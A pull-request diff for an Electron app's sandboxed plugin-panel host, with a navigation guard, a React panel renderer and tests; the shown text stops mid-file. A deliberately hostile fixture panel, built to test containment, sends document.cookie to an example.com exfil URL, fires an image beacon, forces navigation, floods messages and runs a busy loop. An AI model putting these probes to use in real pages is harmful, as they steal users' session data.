### PR TITLE
feat(plugins): add sandboxed panel host and renderer

### DIFF
--- a/examples/plugins/hostile-panel/orca-plugin.json
+++ b/examples/plugins/hostile-panel/orca-plugin.json
@@ -1,0 +1,16 @@
+{
+  "manifestVersion": 1,
+  "id": "hostile-panel",
+  "publisher": "orca-samples",
+  "name": "Hostile Panel (security fixture)",
+  "version": "1.0.0",
+  "description": "Deliberately hostile panel used by the plugin containment tests: exfiltration, navigation, message floods, busy loops. Never grant it anything.",
+  "engines": { "orca": ">=1.4.0" },
+  "pluginApi": 1,
+  "contributes": {
+    "panels": [
+      { "id": "hostile", "title": "Hostile Fixture", "icon": "bug", "entry": "panel.html" }
+    ]
+  },
+  "capabilities": []
+}

--- a/examples/plugins/hostile-panel/panel.html
+++ b/examples/plugins/hostile-panel/panel.html
@@ -1,0 +1,206 @@
+<!doctype html>
+<html>
+  <head>
+    <meta charset="utf-8" />
+    <!-- Security test fixture: every attempt below MUST be contained by the
+         host-injected CSP, the iframe sandbox, and the bridge budgets. Each
+         probe reports pass/fail into the DOM so the containment run is
+         directly observable in the panel. -->
+  </head>
+  <body>
+    <h1>Hostile panel fixture</h1>
+    <ul id="results"></ul>
+    <button id="bridge">Run bridge budget probes</button>
+    <button id="navigate-top">Try top navigation</button>
+    <button id="navigate-self">Try self navigation</button>
+    <button id="navigate-anchor-form">Try anchor and form navigation</button>
+    <button id="navigate-meta">Try meta refresh navigation</button>
+    <button id="busy">Enter busy loop (watchdog probe)</button>
+    <script>
+      'use strict'
+      // The main-process guard must bind the frame before plugin parsing.
+      window.name = ''
+      var results = document.getElementById('results')
+      function report(name, contained, detail) {
+        if (document.querySelector('[data-probe="' + name + '"]')) return
+        var li = document.createElement('li')
+        li.dataset.probe = name
+        li.dataset.contained = contained ? 'true' : 'false'
+        li.textContent =
+          name + ': ' + (contained ? 'CONTAINED' : 'ESCAPED') + (detail ? ' — ' + detail : '')
+        results.appendChild(li)
+        document.title = 'probes:' + results.children.length
+      }
+
+      // Probe 1: fetch() exfiltration — must be blocked by connect-src 'none'.
+      var cookieValue = 'x'
+      try {
+        cookieValue = document.cookie || 'x'
+      } catch (_) {
+        // Opaque-origin frames may reject cookie access before CSP runs.
+      }
+      fetch('https://example.com/exfil?d=' + encodeURIComponent(cookieValue))
+        .then(function () {
+          report('fetch-exfil', false, 'request succeeded')
+        })
+        .catch(function () {
+          report('fetch-exfil', true)
+        })
+
+      // Probe 2: <img> beacon — must be blocked by img-src data: only.
+      var img = new Image()
+      var settled = false
+      img.onload = function () {
+        if (!settled) {
+          settled = true
+          report('img-beacon', false, 'image loaded')
+        }
+      }
+      img.onerror = function () {
+        if (!settled) {
+          settled = true
+          report('img-beacon', true)
+        }
+      }
+      img.src = 'https://example.com/beacon.gif'
+      setTimeout(function () {
+        if (!settled) {
+          settled = true
+          report('img-beacon', true, 'no load event')
+        }
+      }, 3000)
+
+      // Navigation probes are opt-in so a failed attempt cannot erase the
+      // network and bridge evidence before the harness observes it.
+      document.getElementById('navigate-top').addEventListener('click', function () {
+        try {
+          window.top.location.href = 'https://example.com/'
+          setTimeout(function () {
+            report('top-navigation', window.top !== window)
+          }, 0)
+        } catch (error) {
+          report('top-navigation', true, error.name)
+        }
+      })
+
+      document.getElementById('navigate-self').addEventListener('click', function () {
+        try {
+          window.location.href = 'https://example.com/self-navigation'
+          setTimeout(function () {
+            report('self-navigation', true)
+          }, 0)
+        } catch (error) {
+          report('self-navigation', true, error.name)
+        }
+      })
+
+      document.getElementById('navigate-anchor-form').addEventListener('click', function () {
+        var anchor = document.createElement('a')
+        anchor.href = 'https://example.com/anchor-navigation'
+        anchor.textContent = 'Navigation probe'
+        document.body.appendChild(anchor)
+        anchor.click()
+
+        var form = document.createElement('form')
+        form.action = 'https://example.com/form-navigation'
+        document.body.appendChild(form)
+        form.requestSubmit()
+        setTimeout(function () {
+          report('anchor-form-navigation', true)
+        }, 0)
+      })
+
+      document.getElementById('navigate-meta').addEventListener('click', function () {
+        var refresh = document.createElement('meta')
+        refresh.httpEquiv = 'refresh'
+        refresh.content = '0;url=https://example.com/meta-refresh'
+        document.head.appendChild(refresh)
+        setTimeout(function () {
+          report('meta-refresh-navigation', true)
+        }, 0)
+      })
+
+      // Probe 7: an oversized valid-looking call must receive a real refusal.
+      window.addEventListener('message', function (event) {
+        var data = event.data
+        if (event.source !== window.parent || !data || data.type !== 'orca-panel-action-result') {
+          return
+        }
+        if (data.requestId === 'oversized-probe') {
+          report(
+            'oversized-message',
+            !data.ok && data.errorCode === 'invalid_request',
+            data.errorCode || 'unexpected success'
+          )
+        }
+        if (data.requestId === 'flood-result') {
+          report(
+            'message-flood',
+            !data.ok && data.errorCode === 'rate_limited',
+            data.errorCode || 'unexpected success'
+          )
+        }
+      })
+
+      document.getElementById('bridge').addEventListener('click', function () {
+        window.parent.postMessage(
+          {
+            type: 'orca-panel-action',
+            requestId: 'oversized-probe',
+            action: 'workspace.readContext',
+            params: { padding: 'x'.repeat(128 * 1024) }
+          },
+          '*'
+        )
+        setTimeout(function () {
+          report('oversized-message', false, 'host sent no refusal')
+        }, 2000)
+
+        // Probe 8: invalid, pong, and binary floods must all spend rate budget
+        // before parsing; the final valid call is the observable oracle.
+        setTimeout(function () {
+          for (var i = 0; i < 40; i++) {
+            var payload =
+              i % 3 === 0
+                ? { type: 'orca-panel-pong', pingId: i }
+                : i % 3 === 1
+                  ? { type: 'invalid-hostile-message', sequence: i }
+                  : new Uint8Array(2048)
+            window.parent.postMessage(payload, '*')
+          }
+          window.parent.postMessage(
+            {
+              type: 'orca-panel-action',
+              requestId: 'flood-result',
+              action: 'workspace.readContext',
+              params: {}
+            },
+            '*'
+          )
+          setTimeout(function () {
+            report('message-flood', false, 'host sent no rate-limit refusal')
+          }, 2000)
+        }, 150)
+      })
+
+      // Probe 9: opt-in busy loop. The watchdog should demote the panel while
+      // Chromium keeps the sandboxed frame in its isolated renderer process.
+      function enterBusyLoop() {
+        report('busy-loop', true, 'watchdog should suspend this panel')
+        while (true) {
+          // Deliberately hostile fixture.
+        }
+      }
+      document.getElementById('busy').addEventListener('click', enterBusyLoop)
+      window.addEventListener('message', function (event) {
+        if (
+          event.source === window.parent &&
+          event.data &&
+          event.data.type === 'orca-hostile-busy-probe'
+        ) {
+          enterBusyLoop()
+        }
+      })
+    </script>
+  </body>
+</html>

--- a/src/main/persistence-right-sidebar-tab.test.ts
+++ b/src/main/persistence-right-sidebar-tab.test.ts
@@ -1,0 +1,49 @@
+import { describe, expect, it, vi } from 'vitest'
+
+// Why: persistence.ts touches electron at import time; a minimal stub keeps
+// this normalizer test focused instead of booting the full Store fixture.
+vi.mock('electron', () => ({
+  app: {
+    getPath: () => '/tmp/orca-persistence-right-sidebar-tab-test'
+  },
+  safeStorage: {
+    isEncryptionAvailable: () => false,
+    encryptString: (plaintext: string) => Buffer.from(plaintext, 'utf-8'),
+    decryptString: (ciphertext: Buffer) => ciphertext.toString('utf-8')
+  }
+}))
+
+import { normalizeRightSidebarTab } from './persistence'
+
+describe('normalizeRightSidebarTab', () => {
+  it.each(['explorer', 'search', 'vault', 'workspaces', 'source-control', 'checks', 'ports'])(
+    'preserves the built-in %s tab',
+    (tab) => {
+      expect(normalizeRightSidebarTab(tab)).toBe(tab)
+    }
+  )
+
+  // Regression: pr-checks was missing from the allow-list, so the folder
+  // PR Checks tab silently reset to Explorer on every app restart.
+  it('preserves the folder-only pr-checks tab across restarts', () => {
+    expect(normalizeRightSidebarTab('pr-checks')).toBe('pr-checks')
+  })
+
+  it('preserves well-formed plugin panel tabs', () => {
+    expect(normalizeRightSidebarTab('plugin:orca-samples.my-plugin/dashboard')).toBe(
+      'plugin:orca-samples.my-plugin/dashboard'
+    )
+  })
+
+  it('normalizes malformed plugin tabs to the default tab', () => {
+    expect(normalizeRightSidebarTab('plugin:orca-samples.my-plugin')).toBe('explorer')
+    expect(normalizeRightSidebarTab('plugin:orca-samples.my-plugin/panel/extra')).toBe('explorer')
+    expect(normalizeRightSidebarTab('plugin:My_Plugin/Panel!')).toBe('explorer')
+  })
+
+  it('normalizes unknown values to the default tab', () => {
+    expect(normalizeRightSidebarTab('bogus')).toBe('explorer')
+    expect(normalizeRightSidebarTab(undefined)).toBe('explorer')
+    expect(normalizeRightSidebarTab(42)).toBe('explorer')
+  })
+})

--- a/src/main/persistence.ts
+++ b/src/main/persistence.ts
@@ -72,6 +72,7 @@ import {
   normalizeProjectRuntimePreference
 } from '../shared/project-execution-runtime'
 import { projectHostSetupProjectionFromRepos } from '../shared/project-host-setup-projection'
+import { isPluginPanelTabKey } from '../shared/plugins/plugin-manifest'
 import type { GitRemoteIdentity } from '../shared/git-remote-identity'
 import {
   buildTaskSourceContextFromRepo,
@@ -818,16 +819,22 @@ function normalizeProjectOrderBy(projectOrderBy: unknown): PersistedState['ui'][
   return getDefaultUIState().projectOrderBy
 }
 
-function normalizeRightSidebarTab(tab: unknown): PersistedState['ui']['rightSidebarTab'] {
+export function normalizeRightSidebarTab(tab: unknown): PersistedState['ui']['rightSidebarTab'] {
   if (
     tab === 'explorer' ||
     tab === 'search' ||
     tab === 'vault' ||
     tab === 'workspaces' ||
+    tab === 'pr-checks' ||
     tab === 'source-control' ||
     tab === 'checks' ||
     tab === 'ports'
   ) {
+    return tab
+  }
+  // Why: plugin tabs are open-ended `plugin:<publisher>.<id>/<panel>` keys; validate the
+  // shape so a persisted plugin tab doesn't reset to Explorer on restart.
+  if (typeof tab === 'string' && isPluginPanelTabKey(tab)) {
     return tab
   }
   return getDefaultUIState().rightSidebarTab

--- a/src/main/plugins/plugin-panel-navigation-guard.test.ts
+++ b/src/main/plugins/plugin-panel-navigation-guard.test.ts
@@ -1,0 +1,41 @@
+import { describe, expect, it } from 'vitest'
+import { PLUGIN_PANEL_FRAME_NAME_PREFIX } from '../../shared/plugins/plugin-panel-bridge'
+import { PluginPanelNavigationRegistry } from './plugin-panel-navigation-guard'
+
+function frame(input: { id: number; name?: string; url?: string }) {
+  let destroyed = false
+  return {
+    frameTreeNodeId: input.id,
+    name: input.name ?? '',
+    isDestroyed: () => destroyed,
+    destroy: () => {
+      destroyed = true
+    }
+  }
+}
+
+describe('PluginPanelNavigationRegistry', () => {
+  it('blocks only host-marked plugin srcdoc frames', () => {
+    const registry = new PluginPanelNavigationRegistry()
+    const plugin = frame({ id: 1, name: `${PLUGIN_PANEL_FRAME_NAME_PREFIX}demo` })
+    const notebook = frame({ id: 2 })
+    registry.register(plugin)
+    registry.register(notebook)
+
+    expect(registry.shouldBlock(plugin, null, 'about:srcdoc')).toBe(false)
+    expect(registry.shouldBlock(plugin, plugin, 'https://example.com')).toBe(true)
+    expect(registry.shouldBlock(notebook, notebook, 'https://example.com')).toBe(false)
+  })
+
+  it('keeps pre-parse identity after name mutation and prunes destroyed frames', () => {
+    const registry = new PluginPanelNavigationRegistry()
+    const plugin = frame({ id: 1, name: `${PLUGIN_PANEL_FRAME_NAME_PREFIX}demo` })
+    registry.register(plugin)
+    plugin.name = ''
+    expect(registry.shouldBlock(plugin, null, 'about:srcdoc')).toBe(false)
+    expect(registry.shouldBlock(plugin, plugin, 'https://example.com')).toBe(true)
+
+    plugin.destroy()
+    expect(registry.shouldBlock(plugin, plugin, 'https://example.com')).toBe(false)
+  })
+})

--- a/src/main/plugins/plugin-panel-navigation-guard.ts
+++ b/src/main/plugins/plugin-panel-navigation-guard.ts
@@ -71,5 +71,5 @@ export function registerPluginPanelNavigationGuard(webContents: WebContents): vo
       event.preventDefault()
     }
   })
-  webContents.once('destroyed', () => registry.clear())
+  webContents.on('destroyed', () => registry.clear())
 }

--- a/src/main/plugins/plugin-panel-navigation-guard.ts
+++ b/src/main/plugins/plugin-panel-navigation-guard.ts
@@ -1,0 +1,75 @@
+import type { WebContents, WebFrameMain } from 'electron'
+import { PLUGIN_PANEL_FRAME_NAME_PREFIX } from '../../shared/plugins/plugin-panel-bridge'
+
+type NavigationFrame = Pick<WebFrameMain, 'frameTreeNodeId' | 'isDestroyed' | 'name'>
+
+type RegisteredFrame = {
+  frame: NavigationFrame
+  initialSrcdocPending: boolean
+}
+
+/** Records host-marked panel frame identities at browsing-context creation,
+ * before plugin parsing can mutate window.name. */
+export class PluginPanelNavigationRegistry {
+  private readonly frames = new Map<number, RegisteredFrame>()
+
+  register(frame: NavigationFrame): void {
+    this.prune()
+    if (frame.name.startsWith(PLUGIN_PANEL_FRAME_NAME_PREFIX)) {
+      this.frames.set(frame.frameTreeNodeId, { frame, initialSrcdocPending: true })
+    }
+  }
+
+  shouldBlock(
+    frame: NavigationFrame | null,
+    initiator: NavigationFrame | null,
+    destinationUrl: string
+  ): boolean {
+    this.prune()
+    const registeredTarget = frame ? this.frames.get(frame.frameTreeNodeId) : undefined
+    if (registeredTarget) {
+      // Why: registration happens before the host-provided srcdoc commits;
+      // allow exactly that initial document, then contain every navigation.
+      if (registeredTarget.initialSrcdocPending && destinationUrl === 'about:srcdoc') {
+        registeredTarget.initialSrcdocPending = false
+        return false
+      }
+      return true
+    }
+    return Boolean(initiator && this.frames.has(initiator.frameTreeNodeId))
+  }
+
+  clear(): void {
+    this.frames.clear()
+  }
+
+  private prune(): void {
+    for (const [id, registered] of this.frames) {
+      if (registered.frame.isDestroyed()) {
+        this.frames.delete(id)
+      }
+    }
+  }
+}
+
+export function registerPluginPanelNavigationGuard(webContents: WebContents): void {
+  const registry = new PluginPanelNavigationRegistry()
+  webContents.on('frame-created', (_event, { frame }) => {
+    if (frame) {
+      registry.register(frame)
+    }
+  })
+  webContents.on('did-start-navigation', (event) => {
+    if (!event.isMainFrame && event.url === 'about:srcdoc' && event.frame) {
+      // Some Chromium builds populate the frame name only when navigation
+      // starts; this event still precedes document parsing and plugin code.
+      registry.register(event.frame)
+    }
+  })
+  webContents.on('will-frame-navigate', (event) => {
+    if (registry.shouldBlock(event.frame, event.initiator ?? null, event.url)) {
+      event.preventDefault()
+    }
+  })
+  webContents.once('destroyed', () => registry.clear())
+}

--- a/src/main/window/createMainWindow.ts
+++ b/src/main/window/createMainWindow.ts
@@ -49,6 +49,7 @@ import { getMainE2EConfig } from '../e2e-config'
 import { buildEditableContextMenuTemplate } from './editable-context-menu'
 import { clearTrustedUIRendererWebContentsId, setTrustedUIRendererWebContentsId } from '../ipc/ui'
 import { resolveWindowCloseAction } from './window-close-decision'
+import { registerPluginPanelNavigationGuard } from '../plugins/plugin-panel-navigation-guard'
 
 function forceRepaint(window: BrowserWindow): void {
   if (window.isDestroyed()) {
@@ -557,6 +558,8 @@ export function createMainWindow(
 
     event.preventDefault()
   })
+
+  registerPluginPanelNavigationGuard(mainWindow.webContents)
 
   // Why: mirrors the renderer's markdown-editor focus state so the main-process
   // before-input-event handler can skip Cmd/Ctrl+B interception while TipTap

--- a/src/renderer/src/components/right-sidebar/PluginPanel.test.tsx
+++ b/src/renderer/src/components/right-sidebar/PluginPanel.test.tsx
@@ -1,0 +1,357 @@
+// @vitest-environment happy-dom
+
+import { act } from 'react'
+import { createRoot, type Root } from 'react-dom/client'
+import { afterEach, beforeEach, describe, expect, it, vi } from 'vitest'
+import type { ActivePluginPanel } from '@/store/plugin-panels'
+
+vi.mock('@/i18n/i18n', () => ({
+  translate: (_key: string, fallback: string) => fallback
+}))
+
+const { usePluginPanelsMock, setPanelHealthMock } = vi.hoisted(() => ({
+  usePluginPanelsMock: vi.fn<() => ActivePluginPanel[]>(() => []),
+  setPanelHealthMock: vi.fn()
+}))
+
+const { watchdogStartMock, watchdogStopMock, watchdogCallbacks } = vi.hoisted(() => ({
+  watchdogStartMock: vi.fn(),
+  watchdogStopMock: vi.fn(),
+  watchdogCallbacks: { onUnresponsive: null as (() => void) | null }
+}))
+
+vi.mock('@/store/plugin-panels', () => ({
+  usePluginPanels: usePluginPanelsMock,
+  usePluginPanelsStore: (
+    selector: (state: { setPanelHealth: typeof setPanelHealthMock }) => unknown
+  ) => selector({ setPanelHealth: setPanelHealthMock })
+}))
+
+vi.mock('./plugin-panel-watchdog', () => ({
+  createPanelWatchdog: (options: { onUnresponsive: () => void }) => {
+    watchdogCallbacks.onUnresponsive = options.onUnresponsive
+    return {
+      start: watchdogStartMock,
+      stop: watchdogStopMock,
+      handlePong: vi.fn()
+    }
+  }
+}))
+
+import PluginPanel from './PluginPanel'
+
+;(
+  globalThis as typeof globalThis & { IS_REACT_ACT_ENVIRONMENT?: boolean }
+).IS_REACT_ACT_ENVIRONMENT = true
+
+const dashboardPanel: ActivePluginPanel = {
+  id: 'dashboard',
+  title: 'Dashboard',
+  icon: 'gauge',
+  tabKey: 'plugin:orca-samples.my-plugin/dashboard',
+  pluginKey: 'orca-samples.my-plugin',
+  pluginName: 'My Plugin'
+}
+
+let container: HTMLDivElement
+let root: Root
+const readPanelEntryMock = vi.fn()
+const panelActionMock = vi.fn()
+const SESSION_TOKEN = 's'.repeat(43)
+const REFRESHED_SESSION_TOKEN = 'r'.repeat(43)
+let pluginChangedListener: (() => void) | null
+
+function waitForHappyDomTasks(): Promise<void> {
+  return (
+    window as unknown as { happyDOM: { waitUntilComplete: () => Promise<void> } }
+  ).happyDOM.waitUntilComplete()
+}
+
+beforeEach(() => {
+  container = document.createElement('div')
+  document.body.appendChild(container)
+  root = createRoot(container)
+  readPanelEntryMock.mockReset()
+  panelActionMock.mockReset()
+  panelActionMock.mockResolvedValue({ ok: true, value: { delivered: true } })
+  watchdogStartMock.mockReset()
+  watchdogStopMock.mockReset()
+  watchdogCallbacks.onUnresponsive = null
+  setPanelHealthMock.mockReset()
+  document.documentElement.classList.remove('dark')
+  pluginChangedListener = null
+  usePluginPanelsMock.mockReturnValue([dashboardPanel])
+  globalThis.window.api = {
+    plugins: {
+      readPanelEntry: readPanelEntryMock,
+      panelAction: panelActionMock,
+      onChanged: (listener: () => void) => {
+        pluginChangedListener = listener
+        return vi.fn()
+      }
+    }
+  } as unknown as Window['api']
+})
+
+afterEach(async () => {
+  await act(async () => {
+    root.unmount()
+  })
+  container.remove()
+  vi.useRealTimers()
+  vi.restoreAllMocks()
+})
+
+async function renderPanel(tabKey: string): Promise<void> {
+  await act(async () => {
+    root.render(<PluginPanel tabKey={tabKey} />)
+  })
+}
+
+describe('PluginPanel', () => {
+  it('renders the panel HTML in a scripts-only sandboxed iframe', async () => {
+    readPanelEntryMock.mockResolvedValue({
+      html: '<h1>Hello plugin</h1>',
+      sessionToken: SESSION_TOKEN
+    })
+
+    await renderPanel('plugin:orca-samples.my-plugin/dashboard')
+
+    const initialIframe = container.querySelector('iframe')
+    expect(initialIframe).not.toBeNull()
+    expect(readPanelEntryMock).toHaveBeenCalledWith({
+      pluginKey: 'orca-samples.my-plugin',
+      panelId: 'dashboard'
+    })
+    expect(initialIframe?.getAttribute('srcdoc')).toContain('<h1>Hello plugin</h1>')
+    expect(initialIframe?.getAttribute('title')).toBe('Dashboard')
+    expect(initialIframe?.getAttribute('name')).toBe(
+      'orca-plugin-panel:plugin:orca-samples.my-plugin/dashboard'
+    )
+    // Why: allow-same-origin would let plugin HTML reach the app DOM/storage;
+    // the sandbox must stay scripts-only.
+    expect(initialIframe?.getAttribute('sandbox')).toBe('allow-scripts')
+  })
+
+  it('restarts the watchdog after a dev reload replaces the panel document', async () => {
+    readPanelEntryMock.mockResolvedValue({
+      html: '<h1>Hello plugin</h1>',
+      sessionToken: SESSION_TOKEN
+    })
+
+    await renderPanel('plugin:orca-samples.my-plugin/dashboard')
+
+    const iframe = container.querySelector('iframe')
+    expect(iframe).not.toBeNull()
+    expect(watchdogStartMock).toHaveBeenCalledTimes(1)
+
+    readPanelEntryMock.mockResolvedValue({
+      html: '<h1>Reloaded plugin</h1>',
+      sessionToken: SESSION_TOKEN
+    })
+    await act(async () => {
+      pluginChangedListener?.()
+      await waitForHappyDomTasks()
+    })
+
+    const reloadedIframe = container.querySelector('iframe')
+    expect(reloadedIframe).not.toBe(iframe)
+    expect(reloadedIframe?.getAttribute('srcdoc')).toContain('Reloaded plugin')
+    expect(watchdogStopMock).toHaveBeenCalledTimes(1)
+    expect(watchdogStartMock).toHaveBeenCalledTimes(2)
+  })
+
+  it('remounts with fresh host theme tokens when the app theme changes', async () => {
+    readPanelEntryMock.mockResolvedValue({
+      html: '<html class="__ORCA_COLOR_SCHEME__"><head><style>:root{/*__ORCA_PANEL_TOKENS__*/}</style></head>',
+      sessionToken: SESSION_TOKEN
+    })
+    await renderPanel('plugin:orca-samples.my-plugin/dashboard')
+    const lightFrame = container.querySelector('iframe')
+    expect(lightFrame?.getAttribute('srcdoc')).toContain('<html class="light">')
+
+    await act(async () => {
+      document.documentElement.classList.add('dark')
+      await waitForHappyDomTasks()
+    })
+
+    const darkFrame = container.querySelector('iframe')
+    expect(darkFrame).not.toBe(lightFrame)
+    expect(darkFrame?.getAttribute('srcdoc')).toContain('<html class="dark">')
+  })
+
+  it('rebinds a refreshed session without remounting unchanged panel HTML', async () => {
+    readPanelEntryMock.mockResolvedValue({
+      html: '<h1>Hello plugin</h1>',
+      sessionToken: SESSION_TOKEN
+    })
+    await renderPanel('plugin:orca-samples.my-plugin/dashboard')
+    const iframe = container.querySelector('iframe')
+    expect(iframe).not.toBeNull()
+    expect(watchdogStartMock).toHaveBeenCalledTimes(1)
+
+    readPanelEntryMock.mockResolvedValue({
+      html: '<h1>Hello plugin</h1>',
+      sessionToken: REFRESHED_SESSION_TOKEN
+    })
+    await act(async () => {
+      pluginChangedListener?.()
+      await waitForHappyDomTasks()
+    })
+
+    expect(container.querySelector('iframe')).toBe(iframe)
+    expect(watchdogStopMock).not.toHaveBeenCalled()
+    expect(watchdogStartMock).toHaveBeenCalledTimes(1)
+
+    const event = new MessageEvent('message', {
+      data: {
+        type: 'orca-panel-action',
+        requestId: 'request-one',
+        action: 'notifications.show',
+        params: { title: 'Hello' }
+      }
+    })
+    Object.defineProperty(event, 'source', { value: iframe?.contentWindow })
+    await act(async () => {
+      window.dispatchEvent(event)
+      await waitForHappyDomTasks()
+    })
+    expect(panelActionMock).toHaveBeenCalledWith({
+      sessionToken: REFRESHED_SESSION_TOKEN,
+      action: 'notifications.show',
+      params: { title: 'Hello' }
+    })
+  })
+
+  it('ignores an obsolete panel reload that finishes after a newer one', async () => {
+    readPanelEntryMock.mockResolvedValueOnce({
+      html: '<h1>Initial plugin</h1>',
+      sessionToken: SESSION_TOKEN
+    })
+    await renderPanel('plugin:orca-samples.my-plugin/dashboard')
+
+    let resolveObsolete!: (entry: null) => void
+    let resolveCurrent!: (entry: { html: string; sessionToken: string }) => void
+    readPanelEntryMock
+      .mockImplementationOnce(
+        () =>
+          new Promise((resolve) => {
+            resolveObsolete = resolve
+          })
+      )
+      .mockImplementationOnce(
+        () =>
+          new Promise((resolve) => {
+            resolveCurrent = resolve
+          })
+      )
+
+    await act(async () => {
+      pluginChangedListener?.()
+      pluginChangedListener?.()
+      resolveCurrent({
+        html: '<h1>Current plugin</h1>',
+        sessionToken: REFRESHED_SESSION_TOKEN
+      })
+      await waitForHappyDomTasks()
+    })
+    await act(async () => {
+      resolveObsolete(null)
+      await waitForHappyDomTasks()
+    })
+
+    expect(container.querySelector('iframe')?.getAttribute('srcdoc')).toContain('Current plugin')
+    expect(container.textContent).not.toContain('could not be loaded')
+  })
+
+  it('shows an error state when the panel entry cannot be read', async () => {
+    readPanelEntryMock.mockResolvedValue(null)
+
+    await renderPanel('plugin:orca-samples.my-plugin/dashboard')
+
+    expect(container.querySelector('iframe')).toBeNull()
+    expect(container.textContent).toContain('The plugin panel could not be loaded.')
+  })
+
+  it('recovers from a transient read failure with byte-identical HTML', async () => {
+    readPanelEntryMock.mockResolvedValue({
+      html: '<h1>Hello plugin</h1>',
+      sessionToken: SESSION_TOKEN
+    })
+    await renderPanel('plugin:orca-samples.my-plugin/dashboard')
+    const initialFrame = container.querySelector('iframe')
+
+    readPanelEntryMock.mockResolvedValueOnce(null)
+    await act(async () => {
+      pluginChangedListener?.()
+      await waitForHappyDomTasks()
+    })
+    expect(container.textContent).toContain('could not be loaded')
+
+    readPanelEntryMock.mockResolvedValueOnce({
+      html: '<h1>Hello plugin</h1>',
+      sessionToken: REFRESHED_SESSION_TOKEN
+    })
+    await act(async () => {
+      pluginChangedListener?.()
+      await waitForHappyDomTasks()
+    })
+
+    expect(container.querySelector('iframe')).not.toBe(initialFrame)
+    expect(container.querySelector('iframe')?.getAttribute('srcdoc')).toContain('Hello plugin')
+    expect(setPanelHealthMock).toHaveBeenLastCalledWith(
+      'plugin:orca-samples.my-plugin/dashboard',
+      'healthy'
+    )
+  })
+
+  it('publishes watchdog suspension to host-owned panel health state', async () => {
+    readPanelEntryMock.mockResolvedValue({
+      html: '<h1>Hello plugin</h1>',
+      sessionToken: SESSION_TOKEN
+    })
+    await renderPanel('plugin:orca-samples.my-plugin/dashboard')
+
+    await act(async () => watchdogCallbacks.onUnresponsive?.())
+
+    expect(setPanelHealthMock).toHaveBeenCalledWith(
+      'plugin:orca-samples.my-plugin/dashboard',
+      'error'
+    )
+    expect(container.textContent).toContain('stopped responding and was suspended')
+  })
+
+  it('keeps a watchdog error published when navigation unmounts the failed panel', async () => {
+    readPanelEntryMock.mockResolvedValue({
+      html: '<h1>Hello plugin</h1>',
+      sessionToken: SESSION_TOKEN
+    })
+    await renderPanel('plugin:orca-samples.my-plugin/dashboard')
+    setPanelHealthMock.mockClear()
+    await act(async () => watchdogCallbacks.onUnresponsive?.())
+
+    await act(async () => root.render(<div>Explorer</div>))
+
+    expect(setPanelHealthMock).toHaveBeenCalledTimes(1)
+    expect(setPanelHealthMock).toHaveBeenCalledWith(
+      'plugin:orca-samples.my-plugin/dashboard',
+      'error'
+    )
+  })
+
+  it('shows an unavailable state for a tab whose plugin is gone', async () => {
+    usePluginPanelsMock.mockReturnValue([])
+
+    await renderPanel('plugin:orca-samples.removed-plugin/dashboard')
+
+    expect(readPanelEntryMock).not.toHaveBeenCalled()
+    expect(container.textContent).toContain('This plugin panel is no longer available.')
+  })
+
+  it('treats a malformed plugin tab key as unavailable', async () => {
+    await renderPanel('plugin:not-a-valid-key')
+
+    expect(readPanelEntryMock).not.toHaveBeenCalled()
+    expect(container.textContent).toContain('This plugin panel is no longer available.')
+  })
+})

--- a/src/renderer/src/components/right-sidebar/PluginPanel.tsx
+++ b/src/renderer/src/components/right-sidebar/PluginPanel.tsx
@@ -1,0 +1,234 @@
+import React, { useEffect, useMemo, useRef, useState } from 'react'
+import { isPluginPanelTabKey } from '../../../../shared/plugins/plugin-manifest'
+import {
+  PANEL_PING_TYPE,
+  PLUGIN_PANEL_FRAME_NAME_PREFIX
+} from '../../../../shared/plugins/plugin-panel-bridge'
+import {
+  PANEL_SHELL_COLOR_SCHEME_PLACEHOLDER,
+  PANEL_SHELL_TOKENS_PLACEHOLDER
+} from '../../../../shared/plugins/plugin-panel-shell'
+import {
+  callPanelActionViaPreload,
+  createPanelBridgeMessageHandler
+} from './plugin-panel-bridge-host'
+import { createPanelWatchdog } from './plugin-panel-watchdog'
+import { buildPanelDesignTokenCss, currentPanelColorScheme } from './plugin-panel-design-token-css'
+import { usePluginPanels, usePluginPanelsStore } from '@/store/plugin-panels'
+import { translate } from '@/i18n/i18n'
+import { usePluginPanelThemeRevision } from './use-plugin-panel-theme-revision'
+
+type PluginPanelProps = {
+  tabKey: string
+}
+
+type PluginPanelEntryState =
+  | { status: 'loading' }
+  | { status: 'error' }
+  | { status: 'unresponsive' }
+  | { status: 'ready'; shellHtml: string; documentRevision: number }
+
+function PluginPanelMessage({ children }: { children: React.ReactNode }): React.JSX.Element {
+  return (
+    <div className="flex min-h-0 flex-1 items-center justify-center p-6 text-center text-sm text-muted-foreground">
+      {children}
+    </div>
+  )
+}
+
+/** Fills the shell placeholders main cannot know (theme class + token
+ *  values). First-occurrence replace: the prelude parses before any plugin
+ *  content, so a plugin echoing the placeholder string is inert. */
+function fillPanelShell(html: string): string {
+  return html
+    .replace(PANEL_SHELL_COLOR_SCHEME_PLACEHOLDER, currentPanelColorScheme())
+    .replace(PANEL_SHELL_TOKENS_PLACEHOLDER, buildPanelDesignTokenCss())
+}
+
+function PluginPanel({ tabKey }: PluginPanelProps): React.JSX.Element {
+  const panels = usePluginPanels()
+  const setPanelHealth = usePluginPanelsStore((state) => state.setPanelHealth)
+  const themeRevision = usePluginPanelThemeRevision()
+  const panel = isPluginPanelTabKey(tabKey)
+    ? (panels.find((entry) => entry.tabKey === tabKey) ?? null)
+    : null
+  const [entryState, setEntryState] = useState<PluginPanelEntryState>({ status: 'loading' })
+  const [sessionToken, setSessionToken] = useState<string | null>(null)
+  const [loadedFrameKey, setLoadedFrameKey] = useState<string | null>(null)
+  const iframeRef = useRef<HTMLIFrameElement | null>(null)
+
+  const pluginKey = panel?.pluginKey ?? null
+  const panelId = panel?.id ?? null
+  const panelShell = entryState.status === 'ready' ? entryState.shellHtml : null
+  const panelDocument = panelShell ? fillPanelShell(panelShell) : null
+  const panelFrameKey =
+    entryState.status === 'ready'
+      ? `${tabKey}:${entryState.documentRevision}:${themeRevision}`
+      : null
+  const watchdog = useMemo(
+    () =>
+      createPanelWatchdog({
+        sendPing: (pingId) =>
+          iframeRef.current?.contentWindow?.postMessage({ type: PANEL_PING_TYPE, pingId }, '*'),
+        onUnresponsive: () => {
+          setPanelHealth(tabKey, 'error')
+          setEntryState({ status: 'unresponsive' })
+        }
+      }),
+    [setPanelHealth, tabKey]
+  )
+
+  useEffect(() => {
+    if (!sessionToken || !panelDocument) {
+      return
+    }
+    let active = true
+    const handler = createPanelBridgeMessageHandler({
+      sessionToken,
+      getPanelWindow: () => iframeRef.current?.contentWindow ?? null,
+      callPanelAction: callPanelActionViaPreload,
+      isActive: () => active,
